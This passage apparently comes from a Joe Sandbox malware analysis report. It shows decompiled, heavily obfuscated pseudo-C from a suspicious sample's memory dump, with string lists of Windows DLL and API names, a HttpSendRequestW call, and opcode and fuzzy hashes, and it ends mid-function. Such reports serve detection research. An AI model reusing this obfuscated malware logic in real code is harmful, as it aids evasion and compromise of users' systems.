                                                          						 *(_t224 - 8) = _t75;
                                                          						if(_t75 > 0x23) {
                                                          							_t120 = 0x4283c3;
                                                          							 *(_t224 - 0x10) = 0x4283c3;
                                                          							_t181 = 0x69b3;
                                                          							 *0x5081ac = _t207;
                                                          						}
                                                          						_t208 = _t207 - 0x911f;
                                                          						E00508230 = _t221;
                                                          						_t76 =  *(_t224 - 8);
                                                          						_t122 = (_t120 >> _t181) + _t76;
                                                          						_push( *0x508044);
                                                          						if(_t181 >= _t181) {
                                                          							_t181 = 0;
                                                          							if(0 >= 0) {
                                                          								 *0x50819a =  *0x50819a;
                                                          							}
                                                          							_t208 =  *0x508200; // 0x7ac4
                                                          							 *0x50afe1 = _t76;
                                                          							_t221 = 0;
                                                          						}
                                                          						_t222 = _t221 + 0xbc99e7;
                                                          						 *0x50afe5 =  *0x50afe5 + _t76;
                                                          						_push( *0x5081da);
                                                          						 *(_t224 - 8) = _t76;
                                                          						E004650DC(_t122, _t181, _t208, 0, _t221 + 0xbc99e7, 0);
                                                          						 *((intOrPtr*)(_t224 - 0xc)) = 0x508099;
                                                          						_t83 =  *(_t224 - 8);
                                                          						_t129 =  *((intOrPtr*)(_t224 - 0xc)) - 0x51;
                                                          						 *(_t224 - 8) = _t83;
                                                          						if(_t83 <= 0x1ea54f) {
                                                          							 *(_t224 - 0x10) = 0xffffffffffffbe4b;
                                                          							_t129 = 0;
                                                          						}
                                                          						 *0x5081aa = 0x7da6;
                                                          						_t85 = E005007C9(_t129, _t222);
                                                          						 *0x50afe3 = _t85;
                                                          						 *0x50afe6 = _t85;
                                                          						 *(_t224 - 8) = _t85;
                                                          						 *((intOrPtr*)(_t224 - 0xc)) = 0x2f9971;
                                                          						 *0x508182 = 0x6461;
                                                          						_t189 =  *0x5081b8; // 0x0
                                                          						 *0x508204 = 0x7da5;
                                                          						 *0x50821c = 0x7da5;
                                                          						 *0x508134 = _t189;
                                                          						_t95 =  *(_t224 - 8);
                                                          						 *(_t224 - 0x2c) = _t95;
                                                          						 *(_t224 - 8) = _t95;
                                                          						 *((intOrPtr*)(_t224 - 0xc)) =  *((intOrPtr*)(_t224 - 0xc)) + 0x317930;
                                                          						 *0x50afda =  *0x50afda - 0x317930;
                                                          						 *0x508160 = _t189;
                                                          						_t211 =  *0x5081ac; // 0x9f6d
                                                          						 *0x5081fa = _t211;
                                                          						_push( *(_t224 - 0x2c));
                                                          						_push(0x317930);
                                                          						_push( !0xFFFFFFFFFFFFFFBC);
                                                          						_push(1);
                                                          						_push(E00498B48);
                                                          						goto __ebx;
                                                          					}
                                                          					goto L18;
                                                          				}
                                                          			}

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 0y1$CIRCoInst.dll$CNHMWL.dll$DismHost.exe$RemoveVectoredExceptionHandler$RtlImpersonateSelfEx$WindowsCodecs.dll$credssp.dll$ddrawex.dll$f4$psxdllsvr.dll
                                                          • API String ID: 0-3357394030
                                                          • Opcode ID: 2ba5d1d900ca38b171a3d558b219322ac038d3699f07e8afda3ef3be2b058dde
                                                          • Instruction ID: 4a1e1e3463f3c094ae8cff2f5e94ea0d0184ce2aace1860d8fe72a36a84fe7ad
                                                          • Opcode Fuzzy Hash: 2ba5d1d900ca38b171a3d558b219322ac038d3699f07e8afda3ef3be2b058dde
                                                          • Instruction Fuzzy Hash: C8C19D79A547069FCB00DFB9E894AED7BB0FF39314F04407E9984A7352EA780949D70A
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E004B6340(intOrPtr __ebx, signed int __edx, void* __edi, void* __esi) {
                                                          				intOrPtr _t15;
                                                          				char* _t17;
                                                          				char* _t18;
                                                          				char _t19;
                                                          				intOrPtr _t20;
                                                          				char* _t45;
                                                          				intOrPtr _t49;
                                                          				short _t69;
                                                          				short _t70;
                                                          				intOrPtr _t74;
                                                          				short _t78;
                                                          				void* _t97;
                                                          				signed int _t98;
                                                          				void* _t105;
                                                          				void* _t112;
                                                          
                                                          				_t105 = __esi;
                                                          				_t97 = __edi;
                                                          				_t49 = __ebx;
                                                          				_t15 =  *((intOrPtr*)(_t112 - 8));
                                                          				if(_t15 == 0x1f6e48) {
                                                          					L2:
                                                          					_t82 =  *0x508212; // 0xf74b
                                                          					 *0x50afe3 = 0xb4;
                                                          					_t17 =  *0x50afe3; // -68
                                                          					 *0x5086cb =  *0x5086cb - _t97;
                                                          					 *0x50ad3c =  *0x50ad3c + _t97;
                                                          					_t98 = _t97 + _t97;
                                                          					_t18 = _t17;
                                                          					if(_t18 >= 0xc6f) {
                                                          						L5:
                                                          						_t19 = _t18 - 0xc5;
                                                          						 *0x50afe5 = _t19;
                                                          						_t98 = _t98 ^ 0x00d1269e;
                                                          						_t20 = _t19 - 0xf5;
                                                          						if(_t20 == 0) {
                                                          							 *0x508557 = _t20;
                                                          						}
                                                          						 *((intOrPtr*)(_t112 - 0x10)) = _t49;
                                                          						_t70 = _t69;
                                                          						if(_t70 >= _t70) {
                                                          							 *0x508166 = _t70;
                                                          							_t74 =  *0x50819c; // 0x8509
                                                          							 *0x5081e8 = _t82;
                                                          							 *0x508200 = _t82;
                                                          							 *0x50afe3 = "RtlEthernetStringToAddressW";
                                                          							 *0x50afe6 = 0xe6;
                                                          							 *((intOrPtr*)(_t112 - 0x14)) =  *((intOrPtr*)(_t112 - 0x14)) - _t74;
                                                          							 *0x5081ba = 0;
                                                          							 *0x50afe1 = 0;
                                                          							 *0x50afe5 =  *0x50afe5;
                                                          							 *0x50816e = 0x5e6a;
                                                          							_t78 = 0;
                                                          							 *0x508208 = 0x8db8;
                                                          							_t82 = 0x20fa;
                                                          							 *0x50a932 =  *0x50a932 + (_t105 - 0x0000b30e ^ 0x00afab12) + 0xb6bd54 - 0xa2766c;
                                                          							_t15 = 0xc8;
                                                          							_t98 = 0;
                                                          							goto L9;
                                                          						}
                                                          					} else {
                                                          						_t45 = "Microsoft.Office.Tools.Outlook.v9.0.ni.dll" + "Microsoft.Office.Tools.Outlook.v9.0.ni.dll";
                                                          						_t70 = _t69 + 0x58f039;
                                                          						 *0x50afde =  *0x50afde + _t70;
                                                          						if(_t70 < _t70) {
                                                          							goto L10;
                                                          						} else {
                                                          							_t82 =  *0x5081e4; // 0x5a9a
                                                          							 *0x50afe1 = _t45;
                                                          							_t18 =  *0x50afe1; // -128
                                                          							goto L5;
                                                          						}
                                                          					}
                                                          				} else {
                                                          					 *0x5080a4 =  *0x5080a4 + __ebx;
                                                          					_t78 = 0x79c6;
                                                          					_t82 =  !__edx;
                                                          					if(( !__edx & 0x00000094) <= 0) {
                                                          						L9:
                                                          						 *0x50afd8 = _t15 - 0xf0;
                                                          						_t45 = "credssp.dll";
                                                          						 *0x50813c = _t78;
                                                          						_t70 =  *0x508170; // 0x2575
                                                          						L10:
                                                          						 *0x5081a6 =  *0x5081a6 + _t70;
                                                          						 *0x50afe1 = _t45;
                                                          						_t105 = 0xd5ba;
                                                          						 *0x50afe5 = 0;
                                                          					} else {
                                                          						goto L2;
                                                          					}
                                                          				}
                                                          				 *0x5080ee =  *0x5080ee + "GetTickCount64";
                                                          				 *0x50822c = 0x8fcf;
                                                          				 *0x50afe5 = 0xc2;
                                                          				return 0xc2;
                                                          			}

                                                          0x004b636b
                                                          0x004b6503
                                                          0x004b6506
                                                          0x004b6514
                                                          0x004b6528
                                                          0x004b6531
                                                          0x004b6538
                                                          0x004b6538
                                                          0x004b6553
                                                          0x004b655e
                                                          0x004b6563
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x004b636b
                                                          0x004b6588
                                                          0x004b65a5
                                                          0x004b65b3
                                                          0x004b65c6

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: AddInUtil.exe$B5d$BuildExplicitAccessWithNameA$GetTickCount64$Microsoft.Office.Tools.Outlook.v9.0.ni.dll$PenIMC_v0400.dll$RtlEthernetStringToAddressW$System.Web.DynamicData.dll$WcnEapAuthProxy.dll$api-ms-win-core-sysinfo-l1-1-0.dll$credssp.dll
                                                          • API String ID: 0-1059071573
                                                          • Opcode ID: f14f0edd4e5167c864ddc4fed995237339a14ed0bb74da184557d57777ac8cc7
                                                          • Instruction ID: 0301081f286ce31309b285bc4d05663f1b955527571aaf946867adba679d141a
                                                          • Opcode Fuzzy Hash: f14f0edd4e5167c864ddc4fed995237339a14ed0bb74da184557d57777ac8cc7
                                                          • Instruction Fuzzy Hash: BB5104696047428BCB00DF78ECA4AEE2BB1EB39320704557AC895D7767D668080EE725
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 56%
                                                          			E0046F403(char* __eax, void* __ebx, intOrPtr __ecx, unsigned short __edi, void* __esi) {
                                                          				char* _t82;
                                                          				char* _t88;
                                                          				char* _t90;
                                                          				char* _t93;
                                                          				char* _t104;
                                                          				char* _t107;
                                                          				signed char _t113;
                                                          				char* _t114;
                                                          				char* _t117;
                                                          				char* _t119;
                                                          				char* _t133;
                                                          				char* _t155;
                                                          				char* _t175;
                                                          				void* _t176;
                                                          				intOrPtr _t205;
                                                          				void* _t214;
                                                          				signed char _t215;
                                                          				intOrPtr _t228;
                                                          				signed int _t242;
                                                          				unsigned short _t264;
                                                          				unsigned short _t265;
                                                          				void* _t269;
                                                          				signed short _t270;
                                                          				void* _t272;
                                                          
                                                          				_t269 = __esi;
                                                          				_t264 = __edi;
                                                          				 *(_t272 - 8) = __eax;
                                                          				_t82 =  *(_t272 - 8);
                                                          				 *0x509e5b = _t82;
                                                          				 *((intOrPtr*)(_t272 - 0x10)) = __ecx;
                                                          				 *0x50afde =  *0x50afde + 0x6d07;
                                                          				_t243 = 0;
                                                          				 *(_t272 - 8) = _t82;
                                                          				_t214 = 0x6ca7;
                                                          				_push(0);
                                                          				 *0x508b27 = 0;
                                                          				_t88 =  *(_t272 - 8);
                                                          				if(0x6ca7 >= 0x6ca7) {
                                                          					if(0x6d07 < 0x6d07) {
                                                          						_t214 = 0x7917;
                                                          						 *0x5081e0 = 0x8b;
                                                          					}
                                                          					_t243 =  *0x508210; // 0x19f4
                                                          				}
                                                          				 *0x50afe3 = _t88;
                                                          				_push( *0x50812a);
                                                          				 *0x50afe5 = _t88;
                                                          				_t265 = _t264;
                                                          				 *(_t272 - 8) = _t88;
                                                          				_t90 =  *(_t272 - 8);
                                                          				 *(_t272 - 8) = _t90;
                                                          				if(_t90 < 0x21a10d) {
                                                          					L8:
                                                          					 *(_t272 - 0xc) = 0x30b570;
                                                          					_t155 = 0;
                                                          					goto L9;
                                                          				} else {
                                                          					_t155 = "WSearchMigPlugin.dll";
                                                          					_t242 = E0050814C; // 0x4487
                                                          					_t215 = _t242 - 0x6857a3;
                                                          					if((_t243 & 0x0000a3a5) == 0) {
                                                          						_t133 =  *0x50afe3; // -68
                                                          						if(_t133 + 0x1f6 < 0xf) {
                                                          							goto L8;
                                                          						}
                                                          						L9:
                                                          						_t215 = _t214 - 0x5f;
                                                          						_t265 = _t265 >> _t215;
                                                          					}
                                                          				}
                                                          				_t93 =  *(_t272 - 8);
                                                          				_push( *0x508048);
                                                          				 *(_t272 - 8) = _t93;
                                                          				if(_t93 < 0x22d5) {
                                                          					 *(_t272 - 0xc) = 0x3b872f;
                                                          					_t155 = 0;
                                                          					_t215 = 0xffffffffffa11d86;
                                                          				}
                                                          				 *0x508194 = _t215;
                                                          				_push( *0x508048);
                                                          				L004668D8(_t215, 0x991a, _t265, _t269, 1, 1, 0);
                                                          				 *(_t272 - 0xc) = _t155;
                                                          				 *0x508168 =  *0x508168 - 0x650b;
                                                          				_push( *0x5080e6);
                                                          				_t270 = _t269 - 0xd478;
                                                          				 *0x5080ec =  *0x5080ec + "GetTickCount64";
                                                          				E00465B85(_t270, 0, 1);
                                                          				 *0x50afde =  *0x50afde + 0x6f04;
                                                          				 *0x508226 = 0x8e8e;
                                                          				_t104 =  *(_t272 - 8);
                                                          				 *0x50afdd =  *0x50afdd + 0x6f04;
                                                          				 *(_t272 - 8) = _t104;
                                                          				if(_t104 == 0x22) {
                                                          					_t205 =  *0x508b23; // 0x32fb1f
                                                          					if(_t205 == 0x33f1c5) {
                                                          						 *0x5080f2 =  *0x5080f2 - _t205;
                                                          					}
                                                          					 *((intOrPtr*)(_t272 - 0x10)) = _t205;
                                                          				}
                                                          				 *0x508194 = 0x6939;
                                                          				_push( *0x508130);
                                                          				_t107 =  *(_t272 - 8);
                                                          				if("psxdllsvr.dll" <= 0xffffffffffffdaab) {
                                                          					L22:
                                                          					_t265 = _t265 - 1;
                                                          					goto L23;
                                                          				} else {
                                                          					if(0xffffffffffffb556 != 0xffffffffffffb556) {
                                                          						 *0x5081b0 = 0x8e8e;
                                                          					}
                                                          					if((_t270 & 0x0000b246) != 0) {
                                                          						L23:
                                                          					} else {
                                                          						if(_t107 == 0) {
                                                          							goto L22;
                                                          						}
                                                          					}
                                                          				}
                                                          				 *0x508168 = 0x5c96;
                                                          				_t228 =  *0x5081b8; // 0x0
                                                          				_push( *0x5080c8);
                                                          				 *(_t272 - 8) = _t107;
                                                          				_t175 = "RtlImpersonateSelfEx";
                                                          				if(_t175 <= _t175) {
                                                          					_t228 =  *((intOrPtr*)(_t272 - 0x10)) - 0x6690;
                                                          					 *0x50816e =  *0x50816e - _t228;
                                                          					 *0x50afde =  *0x50afde + _t228;
                                                          					if(0x80 >= 0) {
                                                          					}
                                                          					 *0x50afe5 = 0xc0;
                                                          					_t265 = _t265 + 0xd432d1;
                                                          					 *0x5084af = 0;
                                                          				}
                                                          				 *(_t272 - 0xc) = _t175;
                                                          				_t176 = _t175 - 0x47b584;
                                                          				 *0x508120 =  *0x508120 - _t228;
                                                          				 *((intOrPtr*)(_t272 - 0x10)) =  *((intOrPtr*)(_t272 - 0x10)) + _t228;
                                                          				_t251 = 0x7f42;
                                                          				 *0x509893 =  *0x509893 - 0x7f42;
                                                          				_push( *0x508044);
                                                          				_t113 =  *0x5088e7;
                                                          				 *0x50afda =  *0x50afda + _t176;
                                                          				if(_t176 >= 0x3b) {
                                                          					 *0x5081e0 =  *0x5081e0 + 0x7f42;
                                                          					_t251 = E00508230; // 0xa168
                                                          					if((_t113 & 0x000000b3) > 0) {
                                                          						 *0x50afe3 = _t113;
                                                          					}
                                                          					 *0x5086ff =  *0x5086ff - _t265;
                                                          					_t265 = 0;
                                                          					_t113 = 0x11f4d8;
                                                          					 *0x50afd9 =  *0x50afd9 - 0x11f4d8;
                                                          				}
                                                          				if(_t113 <= 0x2729d6) {
                                                          					 *(_t272 - 0xc) =  *(_t272 - 0xc) - 0x3c609d;
                                                          				}
                                                          				_t232 = 0xffffffffffffff8c;
                                                          				 *0x508198 =  *0x508198;
                                                          				 *0x50afdf =  *0x50afdf - _t251;
                                                          				_t114 =  *(_t272 - 8);
                                                          				_push( *0x5080b4);
                                                          				 *(_t272 - 8) = _t114;
                                                          				 *(_t272 - 8) = _t114;
                                                          				 *(_t272 - 0xc) = 0x21f753;
                                                          				_t117 = "credssp.dll";
                                                          				if(0x310bb6 < 0x38) {
                                                          					_t232 = 0x7eb0;
                                                          					 *0x50afdf =  *0x50afdf + _t251;
                                                          				}
                                                          				if((_t251 & 0x000000a1) < 0) {
                                                          				}
                                                          				 *0x50afe3 = _t117;
                                                          				_t119 =  *(_t272 - 8);
                                                          				_push( *0x5080b4);
                                                          				if( *((intOrPtr*)(_t272 - 0x10)) > _t232) {
                                                          					 *0x508140 =  *0x508140 + _t232;
                                                          				}
                                                          				 *(_t272 - 8) = _t119;
                                                          				 *((intOrPtr*)(_t272 - 0x10)) = 0x42efb7;
                                                          				_push( *0x508202);
                                                          				 *(_t272 - 0xc) = 0x30888e;
                                                          				_push(0);
                                                          				_push(E0046F90C);
                                                          				_push(E00465A23);
                                                          				return "CIRCoInst.dll";
                                                          			}

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: CIRCoInst.dll$CNHMWL.dll$Display.dll$GetTickCount64$RtlImpersonateSelfEx$WSearchMigPlugin.dll$credssp.dll$diskperf.exe$psxdllsvr.dll$xmllite.dll
                                                          • API String ID: 0-2321095575
                                                          • Opcode ID: 8e4bcaf9515b674483f8ea6145b4476ae6132be11e37c9e0a8221d2c51eacd89
                                                          • Instruction ID: 0f2d46414affa3ede5ff43e5b0508a43b4beff3773566a59eefb5c6932396f47
                                                          • Opcode Fuzzy Hash: 8e4bcaf9515b674483f8ea6145b4476ae6132be11e37c9e0a8221d2c51eacd89
                                                          • Instruction Fuzzy Hash: F7D1BFB9A107069FCB00DFB8E8D4ADD7BB1FB39310F04817AD995A7362E6780949DB05
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 65%
                                                          			E0048600C(void* __ecx, void* __edi, signed int __esi) {
                                                          				char _t55;
                                                          				intOrPtr _t57;
                                                          				char _t73;
                                                          				intOrPtr _t79;
                                                          				intOrPtr _t81;
                                                          				char _t91;
                                                          				char* _t102;
                                                          				char* _t109;
                                                          				intOrPtr _t114;
                                                          				signed int _t131;
                                                          				short _t133;
                                                          				signed int _t136;
                                                          				signed int _t137;
                                                          				signed int _t143;
                                                          				void* _t144;
                                                          				void* _t152;
                                                          				void* _t153;
                                                          				signed int _t156;
                                                          				signed int _t157;
                                                          				void* _t160;
                                                          
                                                          				_t156 = __esi;
                                                          				_t152 = __edi;
                                                          				 *(_t160 - 0xc) =  &(( *(_t160 - 0xc))[(char*)("GetTickCount64")]);
                                                          				_push( *0x5080c8);
                                                          				_push(0x2f4b41);
                                                          				E00465A23();
                                                          				if(0x2f4b41 <= 0x2f4b41) {
                                                          					 *((intOrPtr*)(_t160 - 0x10)) =  *((intOrPtr*)(_t160 - 0x10)) - 0x5c27;
                                                          				}
                                                          				_t143 =  *0x5081b4; // 0x19f4
                                                          				_push( *0x5080d8);
                                                          				_t55 =  *((intOrPtr*)(_t160 - 8));
                                                          				_t131 = _t143;
                                                          				if((_t143 & 0x000085aa) < 0) {
                                                          					_t143 = _t156;
                                                          					 *0x50afe5 = _t55;
                                                          				}
                                                          				_t91 =  *0x50afe5; // -1
                                                          				 *((intOrPtr*)(_t160 - 8)) = _t55;
                                                          				if(_t91 >= 0x37dd) {
                                                          					L7:
                                                          					_t143 =  *0x50820a; // 0x8e68
                                                          				} else {
                                                          					 *0x50afdd =  *0x50afdd - _t131;
                                                          					if(_t131 < _t131) {
                                                          						_t131 = 0x7ed3;
                                                          						 *0x509763 =  *0x509763 + _t143;
                                                          						 *0x5081d8 = _t143;
                                                          						goto L7;
                                                          					}
                                                          				}
                                                          				_t144 = _t143 - 0xb1;
                                                          				 *0x50825c =  *0x50825c + _t156;
                                                          				 *0x50a646 =  *0x50a646 + _t156;
                                                          				_t57 =  *0x50afe3; // -68
                                                          				_t153 = _t152 + 0xdd70;
                                                          				 *0x50afe5 =  *0x50afe5 + _t57;
                                                          				_push( *0x50813a);
                                                          				_t157 = _t156 | 0x00c077ea;
                                                          				_t133 = 0x7231;
                                                          				_t102 = "xmllite.dll";
                                                          				if(_t102 >= 0x3c0b) {
                                                          					if(_t102 < _t102) {
                                                          						 *0x50afde =  *0x50afde + 0x5b95;
                                                          						_t133 = 0x175b75a;
                                                          						_t144 = 0x8ae3;
                                                          					}
                                                          					 *0x509a43 =  *0x509a43 + _t144;
                                                          				}
                                                          				 *0x508280 =  *0x508280 + _t157;
                                                          				_push( *0x508044);
                                                          				 *(_t160 - 0xc) = 0x30a7d7;
                                                          				 *0x508138 = _t133;
                                                          				_t108 = 0x175b75a;
                                                          				_t136 = _t133 + _t133 + _t133 + _t133 + _t133 + _t133 + _t133 + _t133;
                                                          				E0046776D(_t153, _t157, _t136, 0);
                                                          				 *((intOrPtr*)(_t160 - 0x14)) =  *((intOrPtr*)(_t160 - 0x14)) - _t136;
                                                          				_t137 =  !_t136;
                                                          				_t73 =  *((intOrPtr*)(_t160 - 8));
                                                          				if(_t73 <= 0x909e7) {
                                                          					if(_t73 != 0x172e6c) {
                                                          						L17:
                                                          						if(_t108 > _t108 || _t137 >= _t137) {
                                                          							goto L20;
                                                          						}
                                                          					} else {
                                                          						if(_t73 == 0x3180) {
                                                          							if(0x175e0f7 > 0x175e0f7) {
                                                          								L20:
                                                          								_t137 =  *0x508192; // 0x60e8
                                                          								goto L21;
                                                          							} else {
                                                          								_t108 = 0x2ebc1ee;
                                                          								goto L17;
                                                          							}
                                                          						}
                                                          					}
                                                          				}
                                                          				_push( *0x508026);
                                                          				 *0x50afe5 = _t73;
                                                          				 *((intOrPtr*)(_t160 - 8)) = _t73;
                                                          				_t109 = "EtwEventWriteStartScenario";
                                                          				 *(_t160 - 0xc) = _t109;
                                                          				 *0x508a5f = _t109;
                                                          				_t79 =  *((intOrPtr*)(_t160 - 8));
                                                          				_t114 = "GetAccessPermissionsForObjectW" + "GetAccessPermissionsForObjectW";
                                                          				if(_t114 >= _t137) {
                                                          					_t137 =  !(_t137 - 0x66);
                                                          					 *0x508184 = _t137;
                                                          				}
                                                          				 *0x508204 =  *0x508204 + 0x8c68;
                                                          				 *0x509ba3 =  *0x509ba3 + 0x8c68;
                                                          				 *((intOrPtr*)(_t160 - 8)) = _t79;
                                                          				 *0x508bd3 = _t114;
                                                          				_t81 =  *((intOrPtr*)(_t160 - 8));
                                                          				 *0x508136 = _t137;
                                                          				_push( *0x50806e);
                                                          				 *((intOrPtr*)(_t160 - 8)) = _t81;
                                                          				 *0x508afb =  *0x508afb;
                                                          				 *(_t160 - 0xc) = 0;
                                                          				_push(0);
                                                          				_push(E00486320);
                                                          				_push(E004650DC);
                                                          				return _t81 - 0x1dbd86;
                                                          			}
























                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: AK/$CIRCoInst.dll$EtwEventWriteStartScenario$GetAccessPermissionsForObjectW$GetTickCount64$RtlImpersonateSelfEx$WindowsCodecs.dll$credssp.dll$ddrawex.dll$xmllite.dll
                                                          • API String ID: 0-1001261853
                                                          • Opcode ID: 25b5927973b523345188877257c9ac8f286cac5c7cdcb5629bf84cd0f0a7c015
                                                          • Instruction ID: 52f8df29cf54d983a296b90c8498593450019515b3449586089524d7ce741889
                                                          • Opcode Fuzzy Hash: 25b5927973b523345188877257c9ac8f286cac5c7cdcb5629bf84cd0f0a7c015
                                                          • Instruction Fuzzy Hash: FE818479E007469FCB00EFA9E8D49DDBBF0FB39320F4484AAD94493356E6780949DB05
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • HttpSendRequestW.WININET(?,00000000), ref: 004D7BC5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID: HttpRequestSend
                                                          • String ID: :yP$>$GetAccessPermissionsForObjectW$WindowsCodecs.dll$comcat.dll$tsbyuv.dll
                                                          • API String ID: 360639707-497006389
                                                          • Opcode ID: f930cfe16c32ecd36027b7daa8b542a44a2f4e853c880a36e3592e0af8863439
                                                          • Instruction ID: 7bcd8ff903d42b9b13cb8fecdad8fbb4b9464df85c396470a1dc86448a264a6e
                                                          • Opcode Fuzzy Hash: f930cfe16c32ecd36027b7daa8b542a44a2f4e853c880a36e3592e0af8863439
                                                          • Instruction Fuzzy Hash: 74412579A503428FCB00DF78EC94ADD3BB1EB39320F04816BD894D73A6EA74054AEB55
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 34%
                                                          			E00495303(void* __ebx, void* __ecx, void* __edi) {
                                                          				intOrPtr _t34;
                                                          				char _t36;
                                                          				intOrPtr _t38;
                                                          				intOrPtr _t41;
                                                          				char _t49;
                                                          				char _t51;
                                                          				signed char _t97;
                                                          				void* _t124;
                                                          				void* _t125;
                                                          				void* _t126;
                                                          				signed int _t129;
                                                          				void* _t130;
                                                          
                                                          				_t124 = __edi;
                                                          				_push(1);
                                                          				E00465A23();
                                                          				_t97 =  *0x508192; // 0x60e8
                                                          				_t34 =  *((intOrPtr*)(_t130 - 8));
                                                          				if(0x183e20 >> _t97 >= 0x2662a4) {
                                                          				}
                                                          				 *((intOrPtr*)(_t130 - 8)) = _t34;
                                                          				_t36 =  *((intOrPtr*)(_t130 - 8));
                                                          				 *(_t130 - 0xc) = "EtwEventWriteStartScenario";
                                                          				 *0x508cfb = _t36;
                                                          				_t129 = 0x50afe3;
                                                          				if(_t36 >= 0) {
                                                          					 *0x50afe5 = _t36;
                                                          				}
                                                          				_t125 = _t124;
                                                          				 *((intOrPtr*)(_t130 - 8)) = _t36;
                                                          				_t38 =  *((intOrPtr*)(_t130 - 8));
                                                          				 *(_t130 - 0xc) = 0x3756c6;
                                                          				if(0x3756c6 <= 0x3756c6) {
                                                          					L8:
                                                          					 *0x50b010 =  *0x50b010 + _t125;
                                                          					 *0x50afd9 =  *0x50afd9 + _t38;
                                                          					goto L9;
                                                          				} else {
                                                          					if(0xffffffffffa5ab2c != 0xffffffffffa5ab2c || 0x9440 < 0) {
                                                          						L9:
                                                          						_push(0);
                                                          						 *((intOrPtr*)(_t130 - 8)) = _t38;
                                                          						_t41 =  *((intOrPtr*)(_t130 - 8));
                                                          						 *0x50815a = 0x6736;
                                                          						if(0x6736 < 0x6736) {
                                                          							if(0x6736 >= 0x6736) {
                                                          							}
                                                          						}
                                                          						 *0x50825e =  *0x50825e - _t129;
                                                          						 *0x508276 =  *0x508276 + _t129;
                                                          						_push( *0x508114);
                                                          						 *((intOrPtr*)(_t130 - 8)) = _t41;
                                                          						 *(_t130 - 0xc) = "WindowsCodecs.dll";
                                                          						 *(_t130 - 0xc) = 0x36d39e;
                                                          						 *0x508182 = 0x5a94;
                                                          						 *(_t130 - 0xc) = 0;
                                                          						 *0x508136 = 0x5a94;
                                                          						_t49 =  *((intOrPtr*)(_t130 - 8));
                                                          						 *0x5081d4 = 0x8bf9;
                                                          						_push( *0x508044);
                                                          						 *0x50afe5 = _t49;
                                                          						_t126 = _t125 - 0xdb574f;
                                                          						 *((intOrPtr*)(_t130 - 8)) = _t49;
                                                          						_t51 =  *((intOrPtr*)(_t130 - 8));
                                                          						if(_t49 <= 0x3861) {
                                                          							L18:
                                                          							 *((intOrPtr*)(_t130 - 8)) = _t51;
                                                          							goto L19;
                                                          						} else {
                                                          							 *0x508158 = 0xc90031;
                                                          							 *0x50afe0 =  *0x50afe0 - 0xffffffffffffe28e;
                                                          							if((_t129 & 0x00a3b51d) != 0) {
                                                          								L19:
                                                          								_push( *0x508186);
                                                          								 *((intOrPtr*)(_t130 - 8)) = _t51;
                                                          								_push(0);
                                                          								_push(1);
                                                          								_push(E00495584);
                                                          								_push(E0046776D);
                                                          								return "wmi.dll";
                                                          							}
                                                          							 *0x50afe3 = _t51;
                                                          							if(_t126 - 0xddf4 < 0) {
                                                          								goto L19;
                                                          							}
                                                          							 *0x50afe6 = _t51;
                                                          							if(_t51 < 0x12) {
                                                          								 *0x508054 =  *0x508054 + _t51;
                                                          							}
                                                          							goto L18;
                                                          						}
                                                          					} else {
                                                          						 *0x50afe3 =  *0x50afe3 + _t38;
                                                          						_t129 =  !_t129;
                                                          						goto L8;
                                                          					}
                                                          				}
                                                          			}
















                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: CNHMWL.dll$EtwEventWriteStartScenario$WindowsCodecs.dll$credssp.dll$ddrawex.dll$nshhttp.dll$ul$$wmi.dll
                                                          • API String ID: 0-709279457
                                                          • Opcode ID: 1aaf8a045b0130d67bed1241285cbba3287cbe92992b1982ea4fb91050ea73c3
                                                          • Instruction ID: 582e2f61d25609144b53039c7a616bf619c71b4bf2e67c25aabb22d5be17acb4
                                                          • Opcode Fuzzy Hash: 1aaf8a045b0130d67bed1241285cbba3287cbe92992b1982ea4fb91050ea73c3
                                                          • Instruction Fuzzy Hash: F851F079F407069FCB01DFB8E894ADD7FB2EB39310F14407A8984AB356E679054AEB05
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 80%
                                                          			E004D3903(char _a8) {
                                                          				void* _v8;
                                                          				char* _v12;
                                                          				char _v20;
                                                          				intOrPtr _v8252;
                                                          				intOrPtr _v8256;
                                                          				intOrPtr _v8264;
                                                          				intOrPtr _v8276;
                                                          				intOrPtr _v8280;
